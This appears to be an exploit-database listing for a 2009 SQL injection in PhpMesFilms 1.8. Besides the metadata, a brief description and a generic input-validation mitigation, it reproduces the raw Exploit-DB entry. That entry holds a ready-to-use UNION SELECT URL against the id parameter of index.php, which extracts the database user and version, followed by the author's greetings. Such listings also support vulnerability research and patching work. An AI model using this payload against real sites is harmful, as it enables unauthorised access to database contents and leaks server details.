header-logo
Suggest Exploit
vendor:
PhpMesFilms
by:
indoushka
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PhpMesFilms
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE: N/A
CPE: a:phpmesfilms:phpmesfilms:1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2009

PhpMesFilms 1.8 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains an SQL query that is appended to the vulnerable parameter. This allows the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PhpMesFilms 1.8 SQL Injection Vulnerability
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                                 
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : SQl                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- http://127.0.0.1/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10--
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR